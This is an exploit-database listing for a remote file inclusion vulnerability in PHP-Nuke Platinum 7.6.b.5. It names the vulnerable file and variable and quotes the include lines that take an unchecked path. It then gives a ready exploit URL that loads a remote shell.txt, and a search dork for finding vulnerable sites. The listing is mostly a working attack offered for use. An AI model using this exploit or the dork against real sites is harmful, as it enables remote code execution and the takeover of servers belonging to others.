[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability

Author
BiNgZa
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2245
Category
web applications
Date add
22-10-2007
Platform
unsorted
=============================================================
PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability
=============================================================



----------------------------------------------



Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
Lines:

----------------------------------------------
$phpbb_root_path = 'modules/Forums/';
include($nuke_bb_root_path . 'extension.inc');
include($nuke_bb_root_path . 'common.'.$phpEx);

----------------------------------------------

----------------------------------------------
FoUnD By BiNgZa AKA RaZor
----------------------------------------------
DoRk:Powered by Platinum 7.6.b.5
----------------------------------------------




#  0day.today [2024-11-14]  #